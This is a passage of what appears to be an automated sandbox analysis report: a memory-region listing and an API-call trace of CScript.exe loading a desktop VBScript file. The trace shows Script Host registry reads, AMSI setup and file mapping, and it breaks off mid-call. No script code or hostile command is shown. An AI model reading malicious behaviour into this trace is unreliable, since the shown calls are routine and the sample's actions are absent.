mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 353 start_va = 0xc468990000 end_va = 0xc468990fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c468990000" filename = "" Region: id = 354 start_va = 0x7ffb393b0000 end_va = 0x7ffb39457fff entry_point = 0x7ffb393b0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 355 start_va = 0xc4689a0000 end_va = 0xc4689affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c4689a0000" filename = "" Region: id = 356 start_va = 0x7ffb308c0000 end_va = 0x7ffb308c9fff entry_point = 0x7ffb308c0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 357 start_va = 0x7ffb361e0000 end_va = 0x7ffb36247fff entry_point = 0x7ffb361e0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 358 start_va = 0xc4689b0000 end_va = 0xc4689b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c4689b0000" filename = "" Region: id = 359 start_va = 0x7ffb34cc0000 end_va = 0x7ffb34f33fff entry_point = 0x7ffb34cc0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 360 start_va = 0xc4689d0000 end_va = 0xc4689d2fff entry_point = 0xc4689d0000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 361 start_va = 0xc46aa00000 end_va = 0xc46aa01fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c46aa00000" filename = "" Region: id = 362 start_va = 0xc46b270000 end_va = 0xc46b36ffff entry_point = 0x0 region_type = private name = "private_0x000000c46b270000" filename = "" Region: id = 363 start_va = 0xc46b370000 end_va = 0xc46b46ffff entry_point = 0x0 region_type = private name = "private_0x000000c46b370000" filename = "" Region: id = 364 start_va = 0x7ff76fe08000 end_va = 0x7ff76fe09fff entry_point = 0x0 region_type = private name = "private_0x00007ff76fe08000" filename = "" Region: id = 365 start_va = 0xc46b470000 end_va = 0xc46b56ffff entry_point = 0x0 region_type = private name = "private_0x000000c46b470000" filename = "" Region: id = 366 start_va = 0xc46aa10000 end_va = 0xc46aa22fff entry_point = 0xc46aa10000 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 367 start_va = 0xc46b570000 end_va = 0xc46b66ffff entry_point = 0x0 region_type = private name = "private_0x000000c46b570000" filename = "" Region: id = 368 start_va = 0x7ff76fe06000 end_va = 0x7ff76fe07fff entry_point = 0x0 region_type = private name = "private_0x00007ff76fe06000" filename = "" Region: id = 369 start_va = 0x7ffb36950000 end_va = 0x7ffb36ad2fff entry_point = 0x7ffb36950000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 370 start_va = 0x7ffb2dd30000 end_va = 0x7ffb2e199fff entry_point = 0x7ffb2dd30000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 371 start_va = 0xc46aa30000 end_va = 0xc46aa33fff entry_point = 0xc46aa30000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 372 start_va = 0xc46aa60000 end_va = 0xc46aa63fff entry_point = 0xc46aa60000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 373 start_va = 0xc46aa70000 end_va = 0xc46aa80fff entry_point = 0xc46aa70000 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 374 start_va = 0xc46aba0000 end_va = 0xc46abe2fff entry_point = 0xc46aba0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000007.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000007.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000007.db") Region: id = 375 start_va = 0xc46ac00000 end_va = 0xc46ac21fff entry_point = 0xc46ac00000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000012.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000012.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000012.db") Region: id = 376 start_va = 0xc46ac30000 end_va = 0xc46ac30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c46ac30000" filename = "" Region: id = 377 start_va = 0xc46b670000 end_va = 0xc46b6fafff entry_point = 0xc46b670000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 378 start_va = 0x7ffb3a410000 end_va = 0x7ffb3a453fff entry_point = 0x7ffb3a410000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Thread: id = 1 os_tid = 0xe9c [0018.275] GetModuleHandleA (lpModuleName=0x0) returned 0x7ff770f20000 [0018.276] GetVersionExA (in: lpVersionInformation=0xc4685bf810*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xc4685bf810*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x2800, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0018.276] GetUserDefaultLCID () returned 0x409 [0018.283] GetLocaleInfoW (in: Locale=0x409, LCType=0x20000070, lpLCData=0xc4685bf380, cchData=2 | out: lpLCData="") returned 2 [0018.283] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x7ffb3d260000 [0018.284] GetProcAddress (hModule=0x7ffb3d260000, lpProcName="SetThreadUILanguage") returned 0x7ffb3d27d550 [0018.284] SetThreadUILanguage (LangId=0x0) returned 0x409 [0018.301] FreeLibrary (hLibModule=0x7ffb3d260000) returned 1 [0018.301] GetCommandLineW () returned="\"C:\\Windows\\System32\\CScript.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\MSC000~1.VBS\" " [0018.301] wcscpy_s (in: _Destination=0xc4685bf860, _SizeInWords=0x4d, _Source="\"C:\\Windows\\System32\\CScript.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\MSC000~1.VBS\" " | out: _Destination="\"C:\\Windows\\System32\\CScript.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\MSC000~1.VBS\" ") returned 0x0 [0018.301] wcscpy_s (in: _Destination=0xc4685bf860, _SizeInWords=0x4d, _Source="C:\\Windows\\System32\\CScript.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\MSC000~1.VBS\" " | out: _Destination="C:\\Windows\\System32\\CScript.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\MSC000~1.VBS\" ") returned 0x0 [0018.301] wcscpy_s (in: _Destination=0xc4685bf89e, _SizeInWords=0x2d, _Source=" \"C:\\Users\\CIIHMN~1\\Desktop\\MSC000~1.VBS\" " | out: _Destination=" \"C:\\Users\\CIIHMN~1\\Desktop\\MSC000~1.VBS\" ") returned 0x0 [0018.301] wcscpy_s (in: _Destination=0xc4685bf8a2, _SizeInWords=0x2a, _Source="C:\\Users\\CIIHMN~1\\Desktop\\MSC000~1.VBS\" " | out: _Destination="C:\\Users\\CIIHMN~1\\Desktop\\MSC000~1.VBS\" ") returned 0x0 [0018.301] wcscpy_s (in: _Destination=0xc4685bf8ee, _SizeInWords=0x3, _Source=" " | out: _Destination=" ") returned 0x0 [0018.301] GetCurrentThreadId () returned 0xe9c [0018.301] CoInitialize (pvReserved=0x0) returned 0x0 [0018.655] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xc4685bf4d8 | out: phkResult=0xc4685bf4d8*=0x0) returned 0x2 [0018.655] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xc4685bf4d0 | out: phkResult=0xc4685bf4d0*=0xec) returned 0x0 [0018.655] RegQueryValueExW (in: hKey=0xec, lpValueName="Enabled", lpReserved=0x0, lpType=0xc4685be7c4, lpData=0xc4685bebd0, lpcbData=0xc4685be7c0*=0x400 | out: lpType=0xc4685be7c4*=0x0, lpData=0xc4685bebd0*=0x0, lpcbData=0xc4685be7c0*=0x400) returned 0x2 [0018.655] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0018.672] RegCloseKey (hKey=0xec) returned 0x0 [0018.672] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xc4685bf1f0 | out: phkResult=0xc4685bf1f0*=0x0) returned 0x2 [0018.672] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xc4685bf1e8 | out: phkResult=0xc4685bf1e8*=0xec) returned 0x0 [0018.672] RegQueryValueExW (in: hKey=0xec, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0xc4685be4e4, lpData=0xc4685be8f0, lpcbData=0xc4685be4e0*=0x400 | out: lpType=0xc4685be4e4*=0x0, lpData=0xc4685be8f0*=0x0, lpcbData=0xc4685be4e0*=0x400) returned 0x2 [0018.672] RegCloseKey (hKey=0xec) returned 0x0 [0018.672] GetACP () returned 0x4e4 [0018.672] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x7ffb3d260000 [0018.672] GetProcAddress (hModule=0x7ffb3d260000, lpProcName="HeapSetInformation") returned 0x7ffb3d280f40 [0018.672] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0018.672] FreeLibrary (hLibModule=0x7ffb3d260000) returned 1 [0018.672] CoRegisterMessageFilter (in: lpMessageFilter=0xc4689f59d0, lplpMessageFilter=0xc4689f59e0 | out: lplpMessageFilter=0xc4689f59e0*=0x0) returned 0x0 [0018.672] IUnknown:AddRef (This=0xc4689f59d0) returned 0x2 [0018.673] GetModuleFileNameW (in: hModule=0x7ff770f20000, lpFilename=0xc4685bf550, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\CScript.exe" (normalized: "c:\\windows\\system32\\cscript.exe")) returned 0x1f [0018.673] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\CScript.exe", lpdwHandle=0xc4685bee70 | out: lpdwHandle=0xc4685bee70) returned 0x714 [0018.673] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\CScript.exe", dwHandle=0x0, dwLen=0x714, lpData=0xc4685be750 | out: lpData=0xc4685be750) returned 1 [0018.673] VerQueryValueW (in: pBlock=0xc4685be750, lpSubBlock="\\", lplpBuffer=0xc4685bee78, puLen=0xc4685bee74 | out: lplpBuffer=0xc4685bee78*=0xc4685be778, puLen=0xc4685bee74) returned 1 [0018.673] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xc4685beec8 | out: phkResult=0xc4685beec8*=0xec) returned 0x0 [0018.673] RegQueryValueExW (in: hKey=0xec, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0xc4685be204, lpData=0xc4685be610, lpcbData=0xc4685be200*=0x400 | out: lpType=0xc4685be204*=0x0, lpData=0xc4685be610*=0x0, lpcbData=0xc4685be200*=0x400) returned 0x2 [0018.673] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xc4685bee80 | out: phkResult=0xc4685bee80*=0x0) returned 0x2 [0018.673] RegQueryValueExW (in: hKey=0xec, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0xc4685bee34, lpData=0xc4685beec0, lpcbData=0xc4685bee30*=0x4 | out: lpType=0xc4685bee34*=0x0, lpData=0xc4685beec0*=0x1, lpcbData=0xc4685bee30*=0x4) returned 0x2 [0018.673] RegQueryValueExW (in: hKey=0xec, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0xc4685be204, lpData=0xc4685be610, lpcbData=0xc4685be200*=0x400 | out: lpType=0xc4685be204*=0x1, lpData="1", lpcbData=0xc4685be200*=0x4) returned 0x0 [0018.673] RegCloseKey (hKey=0xec) returned 0x0 [0018.673] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xc400020019, lpSecurityAttributes=0x0, phkResult=0xc4685beec8, lpdwDisposition=0x0 | out: phkResult=0xc4685beec8*=0xec, lpdwDisposition=0x0) returned 0x0 [0018.673] RegQueryValueExW (in: hKey=0xec, lpValueName="Timeout", lpReserved=0x0, lpType=0xc4685bee54, lpData=0xc4685beec0, lpcbData=0xc4685bee50*=0x4 | out: lpType=0xc4685bee54*=0x0, lpData=0xc4685beec0*=0x1, lpcbData=0xc4685bee50*=0x4) returned 0x2 [0018.673] RegQueryValueExW (in: hKey=0xec, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0xc4685be224, lpData=0xc4685be630, lpcbData=0xc4685be220*=0x400 | out: lpType=0xc4685be224*=0x1, lpData="1", lpcbData=0xc4685be220*=0x4) returned 0x0 [0018.673] RegCloseKey (hKey=0xec) returned 0x0 [0018.673] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x7ffb00020019, lpSecurityAttributes=0x0, phkResult=0xc4685beec8, lpdwDisposition=0x0 | out: phkResult=0xc4685beec8*=0x11c, lpdwDisposition=0x0) returned 0x0 [0018.674] RegQueryValueExW (in: hKey=0x11c, lpValueName="Timeout", lpReserved=0x0, lpType=0xc4685bee54, lpData=0xc4685beec0, lpcbData=0xc4685bee50*=0x4 | out: lpType=0xc4685bee54*=0x0, lpData=0xc4685beec0*=0x1, lpcbData=0xc4685bee50*=0x4) returned 0x2 [0018.674] RegQueryValueExW (in: hKey=0x11c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0xc4685be224, lpData=0xc4685be630, lpcbData=0xc4685be220*=0x400 | out: lpType=0xc4685be224*=0x0, lpData=0xc4685be630*=0x31, lpcbData=0xc4685be220*=0x400) returned 0x2 [0018.674] RegCloseKey (hKey=0x11c) returned 0x0 [0018.674] wcscpy_s (in: _Destination=0xc4685bf14c, _SizeInWords=0x104, _Source="C:\\Users\\CIIHMN~1\\Desktop\\MSC000~1.VBS" | out: _Destination="C:\\Users\\CIIHMN~1\\Desktop\\MSC000~1.VBS") returned 0x0 [0018.674] LoadStringW (in: hInstance=0x7ff770f20000, uID=0x834, lpBuffer=0xc4685bddc0, cchBufferMax=2048 | out: lpBuffer="Microsoft (R) Windows Script Host Version %1!u!.%2!u!\nCopyright (C) Microsoft Corporation. All rights reserved.\n") returned 0x70 [0018.675] FormatMessageW (in: dwFlags=0x500, lpSource=0xc4687d96a8, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0xc4685beda8, nSize=0x0, Arguments=0xc4685bee18 | out: lpBuffer="ꇰ桽Ä") returned 0x6c [0018.675] LocalFree (hMem=0xc4687da1f0) returned 0x0 [0018.675] GetStdHandle (nStdHandle=0xfffffff5) returned 0x2c [0018.676] GetConsoleMode (in: hConsoleHandle=0x2c, lpMode=0xc4685beb60 | out: lpMode=0xc4685beb60) returned 1 [0018.678] WriteConsoleW (in: hConsoleOutput=0x2c, lpBuffer=0xc4687d9bc0*, nNumberOfCharsToWrite=0x6e, lpNumberOfCharsWritten=0xc4685beb68, lpReserved=0x0 | out: lpBuffer=0xc4687d9bc0*, lpNumberOfCharsWritten=0xc4685beb68*=0x6e) returned 1 [0018.680] LoadStringW (in: hInstance=0x7ff770f20000, uID=0x7d1, lpBuffer=0xc4685bd8e0, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13 [0018.680] LoadTypeLib (in: szFile="C:\\Windows\\System32\\CScript.exe", pptlib=0xc4685be920*=0x0 | out: pptlib=0xc4685be920*=0xc4687da400) returned 0x0 [0018.685] ITypeLib:GetTypeInfoOfGuid (in: This=0xc4687da400, GUID=0x7ff770f36e90*(Data1=0x91afbd1b, Data2=0x5feb, Data3=0x43f5, Data4=([0]=0xb0, [1]=0x28, [2]=0xe2, [3]=0xca, [4]=0x96, [5]=0x6, [6]=0x17, [7]=0xec)), ppTInfo=0xc4685be908 | out: ppTInfo=0xc4685be908*=0xc4687dac88) returned 0x0 [0018.772] ITypeLib:GetTypeInfoOfGuid (in: This=0xc4687da400, GUID=0x7ff770f36a90*(Data1=0x2cc5a9d0, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0xc4685be8d8 | out: ppTInfo=0xc4685be8d8*=0xc4687dad38) returned 0x0 [0018.772] ITypeInfo:GetRefTypeOfImplType (in: This=0xc4687dad38, index=0xffffffff, pRefType=0xc4685be8d0 | out: pRefType=0xc4685be8d0*=0xfffffffe) returned 0x0 [0018.772] ITypeInfo:GetRefTypeInfo (in: This=0xc4687dad38, hreftype=0xfffffffe, ppTInfo=0x7ff770f420c8 | out: ppTInfo=0x7ff770f420c8*=0xc4687dad90) returned 0x0 [0018.772] IUnknown:Release (This=0xc4687dad38) returned 0x1 [0018.772] ITypeLib:GetTypeInfoOfGuid (in: This=0xc4687da400, GUID=0x7ff770f377a0*(Data1=0xbf64faf0, Data2=0x5906, Data3=0x426c, Data4=([0]=0xb4, [1]=0xbc, [2]=0x7b, [3]=0x75, [4]=0x3c, [5]=0xbe, [6]=0x81, [7]=0x9f)), ppTInfo=0xc4685be8d8 | out: ppTInfo=0xc4685be8d8*=0xc4687dade8) returned 0x0 [0018.772] ITypeInfo:GetRefTypeOfImplType (in: This=0xc4687dade8, index=0xffffffff, pRefType=0xc4685be8d0 | out: pRefType=0xc4685be8d0*=0xfffffffe) returned 0x0 [0018.772] ITypeInfo:GetRefTypeInfo (in: This=0xc4687dade8, hreftype=0xfffffffe, ppTInfo=0x7ff770f42088 | out: ppTInfo=0x7ff770f42088*=0xc4687dae40) returned 0x0 [0018.772] IUnknown:Release (This=0xc4687dade8) returned 0x1 [0018.772] ITypeLib:GetTypeInfoOfGuid (in: This=0xc4687da400, GUID=0x7ff770f36ea0*(Data1=0x2cc5a9d1, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0xc4685be8d8 | out: ppTInfo=0xc4685be8d8*=0xc4687dae98) returned 0x0 [0018.772] ITypeInfo:GetRefTypeOfImplType (in: This=0xc4687dae98, index=0xffffffff, pRefType=0xc4685be8d0 | out: pRefType=0xc4685be8d0*=0xfffffffe) returned 0x0 [0018.772] ITypeInfo:GetRefTypeInfo (in: This=0xc4687dae98, hreftype=0xfffffffe, ppTInfo=0x7ff770f42048 | out: ppTInfo=0x7ff770f42048*=0xc4687daef0) returned 0x0 [0018.772] IUnknown:Release (This=0xc4687dae98) returned 0x1 [0018.772] IUnknown:Release (This=0xc4687da400) returned 0x4 [0018.772] GetCurrentThreadId () returned 0xe9c [0018.772] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x128 [0018.772] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7ff770f21790, lpParameter=0xc4689f5bf0, dwCreationFlags=0x0, lpThreadId=0xc4689f5c18 | out: lpThreadId=0xc4689f5c18*=0xee4) returned 0x12c [0018.772] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0xc4685beb50*=0x128, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff) returned 0x0 [0018.784] CloseHandle (hObject=0x128) returned 1 [0018.784] GetFullPathNameW (in: lpFileName="C:\\Users\\CIIHMN~1\\Desktop\\MSC000~1.VBS", nBufferLength=0x104, lpBuffer=0xc4685bec40, lpFilePart=0xc4685bec38 | out: lpBuffer="C:\\Users\\CIIHMN~1\\Desktop\\MSC000~1.VBS", lpFilePart=0xc4685bec38*="MSC000~1.VBS") returned 0x26 [0018.784] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".VBS", ulOptions=0x0, samDesired=0x20019, phkResult=0xc4685be140 | out: phkResult=0xc4685be140*=0x146) returned 0x0 [0018.784] RegQueryValueExW (in: hKey=0x146, lpValueName=0x0, lpReserved=0x0, lpType=0xc4685be104, lpData=0xc4685be150, lpcbData=0xc4685be100*=0x800 | out: lpType=0xc4685be104*=0x1, lpData="VBSFile", lpcbData=0xc4685be100*=0x10) returned 0x0 [0018.784] RegCloseKey (hKey=0x146) returned 0x0 [0018.784] wcscat_s (in: _Destination="VBSFile", _SizeInWords=0x40e, _Source="\\ScriptEngine" | out: _Destination="VBSFile\\ScriptEngine") returned 0x0 [0018.784] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="VBSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xc4685be140 | out: phkResult=0xc4685be140*=0x146) returned 0x0 [0018.784] RegQueryValueExW (in: hKey=0x146, lpValueName=0x0, lpReserved=0x0, lpType=0xc4685be104, lpData=0xc4685be9c0, lpcbData=0xc4685be100*=0x200 | out: lpType=0xc4685be104*=0x1, lpData="VBScript", lpcbData=0xc4685be100*=0x12) returned 0x0 [0018.784] RegCloseKey (hKey=0x146) returned 0x0 [0018.784] CLSIDFromString (in: lpsz="VBScript", pclsid=0xc4685be938 | out: pclsid=0xc4685be938*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8))) returned 0x0 [0018.784] CoCreateInstance (in: rclsid=0xc4685be938*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x7ff770f36e60*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xc4685be930 | out: ppv=0xc4685be930*=0xc4689f6360) returned 0x0 [0019.049] __dllonexit () returned 0x7ffb250bf980 [0019.049] __dllonexit () returned 0x7ffb250bf990 [0019.049] __dllonexit () returned 0x7ffb250bf9a0 [0019.050] GetUserDefaultLCID () returned 0x409 [0019.050] GetVersion () returned 0x2800000a [0019.050] GetModuleHandleW (lpModuleName="api-ms-win-core-processthreads-l1-1-2.dll") returned 0x7ffb3d260000 [0019.050] GetProcAddress (hModule=0x7ffb3d260000, lpProcName="QueryProtectedPolicy") returned 0x7ffb3a86d460 [0019.050] VirtualProtect (in: lpAddress=0x7ffb25106670, dwSize=0x8, flNewProtect=0x4, lpflOldProtect=0xc4685bc400 | out: lpflOldProtect=0xc4685bc400*=0x2) returned 1 [0019.050] VirtualProtect (in: lpAddress=0x7ffb25106670, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0xc4685bc400 | out: lpflOldProtect=0xc4685bc400*=0x4) returned 1 [0019.051] GetUserDefaultLCID () returned 0x409 [0019.051] GetACP () returned 0x4e4 [0019.051] LoadLibraryExA (lpLibFileName="amsi.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffb30da0000 [0019.097] GetProcAddress (hModule=0x7ffb30da0000, lpProcName="AmsiInitialize") returned 0x7ffb30da2260 [0019.097] GetProcAddress (hModule=0x7ffb30da0000, lpProcName="AmsiScanString") returned 0x7ffb30da26b0 [0019.097] AmsiInitialize () returned 0x0 [0019.154] GetCurrentThreadId () returned 0xe9c [0019.154] GetCurrentThreadId () returned 0xe9c [0019.154] GetCurrentThreadId () returned 0xe9c [0019.154] GetUserDefaultLCID () returned 0x409 [0019.154] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0019.154] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0xc4685be880, cchData=6 | out: lpLCData="1252") returned 5 [0019.154] IsValidCodePage (CodePage=0x4e4) returned 1 [0019.155] GetModuleHandleW (lpModuleName="api-ms-win-core-delayload-l1-1-1.dll") returned 0x7ffb3a800000 [0019.155] GetProcAddress (hModule=0x7ffb3a800000, lpProcName="ResolveDelayLoadedAPI") returned 0x7ffb3a85a1b0 [0019.155] GetProcAddress (hModule=0x7ffb3a800000, lpProcName="ResolveDelayLoadsFromDll") returned 0x7ffb3a8be790 [0019.155] ResolveDelayLoadedAPI () returned 0x7ffb3ccf7000 [0019.155] CoCreateInstance (in: rclsid=0x7ffb25107688*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ffb25107658*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0xc4689f66a8 | out: ppv=0xc4689f66a8*=0xc4687edc20) returned 0x0 [0019.155] IUnknown:AddRef (This=0xc4687edc20) returned 0x2 [0019.155] GetCurrentProcessId () returned 0xe98 [0019.155] GetCurrentThreadId () returned 0xe9c [0019.155] GetTickCount () returned 0x1774e [0019.155] ISystemDebugEventFire:BeginSession (This=0xc4687edc20, guidSourceID=0x7ffb25107678, strSessionName="VBScript:00003736:00003740:18096078") returned 0x0 [0019.156] GetCurrentThreadId () returned 0xe9c [0019.156] GetCurrentThreadId () returned 0xe9c [0019.156] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\Desktop\\MSC000~1.VBS" (normalized: "c:\\users\\ciihmn~1\\desktop\\msc000~1.vbs"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x170 [0019.156] GetFileSize (in: hFile=0x170, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x12d2 [0019.156] CreateFileMappingA (hFile=0x170, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12d2, lpName=0x0) returned 0x174 [0019.156] MapViewOfFile (hFileMappingObject=0x174, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xc468930000 [0019.157] GetVersionExA (in: lpVersionInformation=0xc4685bea50*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x2, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xc4685bea50*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x2800, dwPlatformId=0x2, 